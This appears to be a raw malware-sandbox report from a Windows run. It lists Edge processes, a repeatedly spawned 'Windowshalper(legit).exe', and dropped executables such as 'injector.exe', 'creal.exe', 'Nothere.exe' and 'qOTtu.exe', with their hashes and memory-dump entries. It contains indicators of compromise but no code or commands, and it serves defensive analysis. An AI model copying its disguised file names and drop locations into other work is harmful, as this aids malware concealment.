"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1284 /prefetch:2
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
Network
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | cf934811d13766a9223b08f43e045782 |
| SHA1 | 710ae48150efb574d0614abf54e1d06acda5d81b |
| SHA256 | d0b23ecf4378d3594d1e2d9261d42a9deccd79779dcede3d58e5d014715023c8 |
| SHA512 | 41a3b1a71e7b2ff35e0ca663db1279edf0f56b215d5d8e8b320539b8c9b9b53e06981741b662857172db619801cb81ee516335a44897abf4a4df6a9efc7bc0ec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
| MD5 | e2d22a1eb3920b6e344aa0d3542d9905 |
| SHA1 | 520f99fc83cdc576330ac8c4cf711af9e228276b |
| SHA256 | f2c18da53cc6fc8fcb3100135184d2a702a7b009cc6decda8d3de41f68a8c3e7 |
| SHA512 | c749f476664662e6ba41d00a125b93e8cf755c920fb2ce28d22d01beca24d3c1678d1bd42a958206784ad13c13a41e97527dfc0d53fbf54f0b1dd7130dbb4eed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | 8ffcc8e60ffbb1e3c0338918820402e4 |
| SHA1 | 1c9f545e1174ec107ef10731bc3db90ca76e61dd |
| SHA256 | c70e48916720e103ccca4e8f532ffec38c2b860ab47be4f272aa0378da09c8f7 |
| SHA512 | 8885152591ce3d0f54acad8600e199dda56da72e9a8b46d3302d3889fe6889ccfc4ff0f4bb2c4769857e3d09c3c485e3227ace8aa2d1b394ee291cfed5f6861a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 43076cf1e2e34e9d6efc2b176831a2a9 |
| SHA1 | fdf0f8e37c4e5ba28fd55e5caf94412d4c289b22 |
| SHA256 | e25148ab882675222ee2fc74163b611c5ec112e7f538c9c002bf8af1a76adcaf |
| SHA512 | ec322fe93277aeeeff5a4801a0321e80f00e996e90357903d647ea26d72721fd2c17075f4caa78767a2f4770689a6774b3da2fcf7a620ac2cc25b2e1a6ba8417 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | bb45a89131c05d7f9303c6da5796d3ba |
| SHA1 | 581963e46b0629665bfbeb082878f89775a9194d |
| SHA256 | 562a23468ebbbb83c7af740257ce43819248593a4d34b5ad60938b91043bcbd5 |
| SHA512 | 61e51b3c3178d061ff6825d57b9421cdfcc62c6b2b74f42d499dcb1122ab6a9ae6aa296a69906cd999ce4e65832fe0ca4cd4756b41996d7de38b60022ced4c5b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | 6a358000e540484505ef1be10de0614d |
| SHA1 | e2428435ae397ab9334ece4fcc9efc73f694f55a |
| SHA256 | 318ac07b9305c2092d2b825a748b810f327267c12b3b7c739796201651f070f1 |
| SHA512 | 344e322a3ab28374794f13883fbcb593321e4c087f495d9e1e51344b18eb97f1885414461129d3e45618e4db26b54b90b8ad1a051dfe562158cf463363cb3889 |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
| MD5 | c04bcb82a84e38916665757851fc49cc |
| SHA1 | 196ff9cb450ec193e3be364fe44d7149205f0b93 |
| SHA256 | 11eec99a6ac4fd78417bd804e81a629a55929ea4c45a2947c8234d1df8158579 |
| SHA512 | 001f7353e33b02a59e5320a0a288e8ec632eb7b9de8290c19e82c3c9dee313c03474b4dfa70f3ec0f11cf28fa143e32877f72159fe5a7701e3aa01a3ef4c2e1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
| MD5 | 26d663b1b0d0e22ed9eac024323c5aec |
| SHA1 | 32f1ba6aabd90be6ad89ee7d9ae029742569ccb8 |
| SHA256 | c1f49c4ee65365d6e8c20c7243fec520081334d7eb5ebfaf0736bb1b333e08c2 |
| SHA512 | 08d2a9d271c14456c7fe8fa0b8d14b93faffc92f8d348dbe13edbfcaa0becaf5035aa58b583daaa23ef29a931ac6dd0a821f0010850fd9b747c3bdcc6436acc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | b54e6a8428f252fee8815d9d8e991a92 |
| SHA1 | 798938bf88f5e4f5d3eecdc2cf49487b5efb8f17 |
| SHA256 | f746e647518bbdc085e252d91f5da35d73d560259cf23867df4172c6c49147f9 |
| SHA512 | 9ec47eb25a144d89c6cb6523008932e4e051a60b93a48279b7a6515015b600610c184d8443910d6ab7b98440c2cbdfa4fc0e737a84acbb77ce36fad0ab630b09 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
| MD5 | 8af64a090194ed847c44dc10367e4b8e |
| SHA1 | ec36047ff549a66218a18ce68044defd245c1b01 |
| SHA256 | 97df3d7079dc4312f4284ed9903ac1eff372956e2fb4aa0a284ac3de3120878c |
| SHA512 | c5ab60c4b09cb3f894b93c00269747e45c1a67b0c8dcc859e1bcfe67f31a54ba062cddc0bc18c882761cce9a3ea795ba2c68aaa827ddb5938280f4498d33037c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | 7bcc499ce01bf0bbc40d2b953c58516e |
| SHA1 | 9a01c3fcf973069f988f6fd5e3e6d8cceeecaa10 |
| SHA256 | 0549365a43492f7128b7b61792866e16c73db40c440505dfd12c80964d78b09c |
| SHA512 | 0df5dd63d5eda8bea05bc593cfe1e4b391b2a26f8ca7b903df31f6bcb093f1059f7cc9850424c7c3d84134a56861b05a967f1638f766f79b29b233ed8e68a258 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13357011505528057
| MD5 | 8606d733bb6862237e5a76bc267f940e |
| SHA1 | f4ca76a96390593e8dcc66c8d41fe51d4cc86416 |
| SHA256 | 82b2e4296a139986d6ea36905e0fd530aec41d2a234ef6ca25f8ff1b507ad7e1 |
| SHA512 | 04dd34dbed845cae57319f9883aa5f490d98855e830573fc333cbdae70bea58f99d93ac9dee7218002c9a1392721cdd1ab0b7f3ca21d137974f812b8a561ec0a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 87beb8369e3b2688e87453e6a2e9a56b |
| SHA1 | 285daf7e6cbe3617e65e2244f8a5880151f09dc1 |
| SHA256 | b6e092635b42c08b4174115b288fb0294ad8b4d74a402a337bda341114f8aa4b |
| SHA512 | a9eda1a89b1d57b0c1eaca8380abfa0b89f0e31829d979d7309f0257e3185fa82a4145258ec23de0f757457d6cdc3fefb5df100f7ceffecfa72d3a846d56d856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | db243a72b2e246857b9f68d2d752f9f1 |
| SHA1 | b24676fbb26672f15934be116b69a8c53922c107 |
| SHA256 | 34c0483e5e80f24f7074880b970354bf2139d934311f0e8e0291615dbb0cfce2 |
| SHA512 | 72f42bd9e1fd902cc4ee9783adcdee062b97276b779c91269bc60f7dd0bbf911a588de5f33c1ad5f17e59b7f97e2f04bed7a85f3d554bb574e176307adaa5068 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
| MD5 | c0af0b03765b4a03458743d620c8491b |
| SHA1 | cc1e9b5cf85d1dbe9449740a3418f2ce05c8728d |
| SHA256 | 3bc292a46146d43be789e78b8db6ba816b41dd3c784a737cd98cc2b3dfcf2234 |
| SHA512 | 443ee527d2572e39aff0382026f4b638fdd4635d4e28531d84efa552d034434b5be5c5ce9528240087d5403649d5a883fa6d577b53b66c0f6c2b180385b1573d |
C:\Users\Admin\Desktop\rage free\Injector.exe
| MD5 | af1600933561571a811579e73ef2a78f |
| SHA1 | 89dbc08104c92fa2d296d2dcdd0cb2152c5ebf4a |
| SHA256 | 7ffea64e10fe0b27f31a2e97e3ec8eaf88a3468d282a53ab1d46ee0f868a9709 |
| SHA512 | 1160ec22d94171837c25ce1f00f6c31cca3725c3a8564cab5278d28f184b7872226a6abb1c24e28ddec0345a79efdef8a4fcfa28d7f7db2cca1d6234bb8927d7 |
memory/836-239-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/836-240-0x0000000000800000-0x00000000018A8000-memory.dmp
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 15fa4864c56c1bc724f1098aba8f08fb |
| SHA1 | faad863bfde036ac3ea9c65090fcdf8716d8147c |
| SHA256 | 3de2e86dde2444292306215c1082423e8ce8f99f5bf6e036dfb07ac32570c993 |
| SHA512 | 75b5bd9273078823218cd061cd62d7cf8a8dd98d9e656007998dec0703169d738c760bc17ee51d5c89065c0b43d41e67e53cda3075d228e26d440d099b7e8465 |
C:\Users\Admin\AppData\Roaming\creal.exe
| MD5 | 43a1e4b885c35fa760c6669c670165b2 |
| SHA1 | 1deea5bd35d69d98c5ff7ac2424004d2ae0e080b |
| SHA256 | 951600adde3d082e2fd9d832d1861c752ad7b3735ecbff956f7029f019572dba |
| SHA512 | 5b4b8066e1380c02a92ec5cc7387af6cd6ea169deae6462ed649113daf633c33aded3bb2b41999eeeacd5a6b820c1000065406736b4b6610275517fe0835d201 |
C:\Users\Admin\AppData\Roaming\Nothere.exe
| MD5 | 20e7e9c5171c2990ffeed3ae319d1d9b |
| SHA1 | efb8fc011d96166707442eadc9b757dad780d33c |
| SHA256 | 3385b4692ff4096c8b13c72105819f29f6f6664b3437614995339da93da317ba |
| SHA512 | 2f1a206de64d52faab38ea678ddbf2c3a9e3c04f24c974e30b44a693d780184606461ddc4a9ee998c4d41582f7c5202151d872c520c32bc1496e8b8c05c22481 |
memory/60-332-0x0000000000F80000-0x0000000000F9C000-memory.dmp
memory/60-330-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/836-329-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI28962\python312.dll
| MD5 | 5c5602cda7ab8418420f223366fff5db |
| SHA1 | 52f81ee0aef9b6906f7751fd2bbd4953e3f3b798 |
| SHA256 | e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce |
| SHA512 | 51c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\VCRUNTIME140.dll
| MD5 | 4585a96cc4eef6aafd5e27ea09147dc6 |
| SHA1 | 489cfff1b19abbec98fda26ac8958005e88dd0cb |
| SHA256 | a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736 |
| SHA512 | d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286 |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\base_library.zip
| MD5 | 3909f1a45b16c6c6ef797032de7e3b61 |
| SHA1 | 5a243f6c8db11bf401aeac69f4c2a0c6cd63b3a8 |
| SHA256 | 56cce68da6a7ebd11aab4b4a4e6a164647b42b29ae57656532c530d1e22e5b44 |
| SHA512 | 647e343eb9732150c0fd12c7142a960ede969b41d5a567940e89636f021f0c0b3249b6cfc99c732190085bcae7aa077f8ac52c8e7fe7817d48a34489f0cd5148 |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\_ctypes.pyd
| MD5 | 10fdcf63d1c3c3b7e5861fbb04d64557 |
| SHA1 | 1aa153efec4f583643046618b60e495b6e03b3d7 |
| SHA256 | bc3b83d2dc9e2f0e6386ed952384c6cf48f6eed51129a50dfd5ef6cbbc0a8fb3 |
| SHA512 | dc702f4100ed835e198507cd06fa5389a063d4600fc08be780690d729ab62114fd5e5b201d511b5832c14e90a5975ed574fc96edb5a9ab9eb83f607c7a712c7f |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\python3.DLL
| MD5 | 77896345d4e1c406eeff011f7a920873 |
| SHA1 | ee8cdd531418cfd05c1a6792382d895ac347216f |
| SHA256 | 1e9224ba7190b6301ef47befa8e383d0c55700255d04a36f7dac88ea9573f2fb |
| SHA512 | 3e98b1b605d70244b42a13a219f9e124944da199a88ad4302308c801685b0c45a037a76ded319d08dbf55639591404665befe2091f0f4206a9472fee58d55c22 |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\_bz2.pyd
| MD5 | c7ce973f261f698e3db148ccad057c96 |
| SHA1 | 59809fd48e8597a73211c5df64c7292c5d120a10 |
| SHA256 | 02d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde |
| SHA512 | a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1 |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\_lzma.pyd
| MD5 | 4e2239ece266230ecb231b306adde070 |
| SHA1 | e807a078b71c660db10a27315e761872ffd01443 |
| SHA256 | 34130d8abe27586ee315262d69af4e27429b7eab1f3131ea375c2bb62cf094be |
| SHA512 | 86e6a1eab3529e600dd5caab6103e34b0f618d67322a5ecf1b80839faa028150c492a5cf865a2292cc8584fba008955da81a50b92301583424401d249c5f1401 |
C:\Users\Admin\AppData\Local\Temp\_MEI28962\libcrypto-3.dll
| MD5 | 51e8a5281c2092e45d8c97fbdbf39560 |
| SHA1 | c499c810ed83aaadce3b267807e593ec6b121211 |
| SHA256 | 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a |
| SHA512 | 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb |
memory/60-370-0x000000001BDA0000-0x000000001BDB0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_trc1ly3f.flw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3288-380-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/3288-381-0x00000159241D0000-0x00000159241E0000-memory.dmp
memory/3288-382-0x00000159241D0000-0x00000159241E0000-memory.dmp
memory/3288-383-0x000001590BD30000-0x000001590BD52000-memory.dmp
memory/3288-387-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/4688-388-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/4688-389-0x000001EB6A150000-0x000001EB6A160000-memory.dmp
memory/4688-390-0x000001EB6A150000-0x000001EB6A160000-memory.dmp
C:\Windows\SoftwareDistribution\Download\qOTtu.exe
| MD5 | 9886a738e05f8a8fe04e9d0c81cc0909 |
| SHA1 | f659c6a123eb11f6f34f618265dbd54a9aa7f5e3 |
| SHA256 | abf99bd1d851c4c7015b999e81fb080e7e1147973e6a3a77c8ba7895cc8abbb6 |
| SHA512 | 0d3b9e9a1a38efe1e963b929a33a8a13d4636d8056ab04fce958333db983b9fb401946c9b6990d18e9c2e2d4c2dbd2fb6aae5385e4234a5d86ef8adb98d56a21 |
memory/4688-433-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/4128-434-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/4128-435-0x000001F16C610000-0x000001F16C620000-memory.dmp
memory/4128-441-0x000001F16C610000-0x000001F16C620000-memory.dmp
memory/4128-447-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/1508-457-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
memory/1508-458-0x000001F037C60000-0x000001F037C70000-memory.dmp
memory/1508-459-0x000001F037C60000-0x000001F037C70000-memory.dmp
memory/1508-461-0x00007FF9735A0000-0x00007FF974061000-memory.dmp
